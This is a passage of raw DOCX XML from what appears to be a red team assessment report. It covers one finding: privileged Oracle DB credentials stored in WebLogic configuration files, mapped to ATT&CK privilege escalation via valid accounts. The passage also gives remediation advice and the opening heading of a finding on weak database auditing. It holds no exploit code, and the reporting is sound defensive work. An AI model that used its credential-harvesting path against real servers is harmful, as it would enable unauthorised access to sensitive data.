      <w:r w:rsidR="00BA2F3A" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">rivileged </w:t>
      </w:r>
      <w:r w:rsidR="00BA2F3A" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Oracle DB</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2F3A" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for daily operations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>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416"/>
        <w:gridCol w:w="1914"/>
        <w:gridCol w:w="3106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B44CC1" w:rsidRPr="001019D3" w14:paraId="17C910BD" w14:textId="77777777" w:rsidTr="00764465">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D7C5112" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453EDA0F" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2872" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174045F9" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B44CC1" w:rsidRPr="001019D3" w14:paraId="2DFC920F" w14:textId="77777777" w:rsidTr="00BA2F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1793EDBE" w14:textId="54C83ED9" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00BA2F3A" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="211445A7" w14:textId="71E22852" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00BA2F3A" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ETS </w:t>
            </w:r>
            <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oracle DB</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1095" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="21C0D0EA" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="008217FA">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TA-0004</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D1B7227" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="20F73782" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="008217FA">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T1078</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47193B16" w14:textId="0B2231D1" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="347C7EA9" w14:textId="211FF203" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00764465">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA23CC" w14:textId="1C900BAD" w:rsidR="00645995" w:rsidRPr="001019D3" w:rsidRDefault="00645995" w:rsidP="00B82EDA">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and performing local reconnaissance on the hosts (</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824973 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>), t</w:t>
      </w:r>
      <w:r w:rsidR="006732F9" w:rsidRPr="001019D3">
        <w:t>he Red Team gained access to high-privileged Oracle credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713DB55" w14:textId="7F6AA66C" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00645995" w:rsidP="00645995">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The high-privileged Oracle DB c</w:t>
      </w:r>
      <w:r w:rsidR="006732F9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">redentials were </w:t>
      </w:r>
      <w:r w:rsidR="00B82EDA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">found in </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">some </w:t>
      </w:r>
      <w:r w:rsidR="006732F9" w:rsidRPr="001019D3">
        <w:t>WebLogic application configuration files</w:t>
      </w:r>
      <w:r w:rsidR="00B82EDA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">need </w:t>
      </w:r>
      <w:r w:rsidR="00B82EDA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">access to </w:t>
      </w:r>
      <w:r w:rsidR="00F53DA0" w:rsidRPr="001019D3">
        <w:t>related Oracle DB server</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006732F9" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> This practice poses a significant security risk because it grants the application</w:t>
      </w:r>
      <w:r w:rsidR="00B82EDA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">and by extension any attacker who compromises </w:t>
      </w:r>
      <w:r w:rsidR="00B82EDA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the user account, </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t>broad administrative access to the database environment. If exploited, an adversary could read or modify sensitive data, create or alter database objects, escalate their privileges, or disable security controls altogether. Such unrestricted access also undermines accountability, as privileged actions become indistinguishable from legitimate application activity, complicating forensic investigations. Ultimately, the use of high-privileged accounts for routine application connectivity creates a single point of failure that could enable large-scale compromise, persistence, and data exfiltration without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD21FB9" w14:textId="60721A8D" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B82EDA" w:rsidP="00B82EDA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E6D75" w14:textId="2BC857DB" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="00784727">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00B82EDA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">redentials for </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle DB </w:t>
      </w:r>
      <w:r w:rsidR="00B82EDA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> discovered in WebLogic </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t>servers</w:t>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">provided access to two Oracle databases </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">that host </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">sensitive </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t>ETS</w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t>. This indicated that no fine-grained access controls were in place and users with access to these tables were used for other operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5559F8DF" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00784727">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="205149E6" wp14:editId="00764EA9">
            <wp:extent cx="5487542" cy="1225550"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="0"/>
            <wp:docPr id="24920963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9639" name="Picture 6" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId40">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="17831"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5508675" cy="1230270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AD54E8" w14:textId="7B947446" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00784727">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc213253804"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: Oracle DB user had access to </w:t>
      </w:r>
      <w:r w:rsidR="006016FE" w:rsidRPr="001019D3">
        <w:t>extracts database</w:t>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="4F9F3693" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00784727">
      <w:pPr>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 30/7/2025 10:24 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD8DA1" w14:textId="77777777" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="000F2F00">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A20DCD6" wp14:editId="368E72F0">
            <wp:extent cx="2249101" cy="1276350"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="0"/>
            <wp:docPr id="40920328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03288" name="Picture 7"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273874" cy="1290409"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F265C" w14:textId="1273C892" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00784727">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc213253805"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: Oracle DB user had access to </w:t>
      </w:r>
      <w:r w:rsidR="006016FE" w:rsidRPr="001019D3">
        <w:t>secrets database</w:t>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w14:paraId="4EDFA58F" w14:textId="046BE5E6" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00B44CC1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 30/07/2025 10:23 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F64F3" w14:textId="494F3915" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72">
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The complete list of servers that reference high-privileged Oracle DB accounts can be found in annex </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213089470 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.7</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008217FA" w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF8909" w14:textId="4860BEF1" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00784727">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r w:rsidR="00784727" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D8E718" w14:textId="1A431637" w:rsidR="00C52CC9" w:rsidRPr="001019D3" w:rsidRDefault="00C52CC9" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">reate </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">and use </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">dedicated </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle DB </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t>accounts with narrowly scoped permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (least privilege)</w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>are used for normal day-to-day operations or sensitive ad-hoc operations such as manage secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877BAD8" w14:textId="18319D60" w:rsidR="00C52CC9" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Regularly review and audit </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle DB </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>database roles and privileges assigned to these accounts to ensure that no excessive rights are granted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D73841" w14:textId="77777777" w:rsidR="00C52CC9" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">All credentials used by WebLogic to connect to </w:t>
      </w:r>
      <w:r w:rsidR="00C52CC9" w:rsidRPr="001019D3">
        <w:t>an Oracle DB</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> should be securely stored, rotated on a scheduled basis, and protected by centralized secrets management solutions rather than embedded in configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F77F2A" w14:textId="39F75219" w:rsidR="00D30888" w:rsidRPr="001019D3" w:rsidRDefault="00C52CC9" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">nable monitoring and alerting for privileged </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle DB </w:t>
      </w:r>
      <w:r w:rsidR="00B44CC1" w:rsidRPr="001019D3">
        <w:t>database account usage so that any unexpected or unauthorized connection can be quickly detected and investigated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4035EAF5" w14:textId="77777777" w:rsidR="00D30888" w:rsidRPr="001019D3" w:rsidRDefault="00D30888">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE8908" w14:textId="14FF04D5" w:rsidR="00D30888" w:rsidRPr="001019D3" w:rsidRDefault="00D30888" w:rsidP="00D30888">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_Ref213100275"/>
      <w:bookmarkStart w:id="203" w:name="_Toc213253574"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Ineffective Oracle DB event auditing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> allows malicious actions to go unnoticed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>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2"/>
        <w:gridCol w:w="2414"/>
        <w:gridCol w:w="1916"/>
        <w:gridCol w:w="3108"/>
      </w:tblGrid>
      <w:tr w:rsidR="00560205" w:rsidRPr="001019D3" w14:paraId="14478D0B" w14:textId="77777777" w:rsidTr="00764465">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="145A2538" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61529029" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2874" w:type="pct"/>
            <w:gridSpan w:val="2"/>
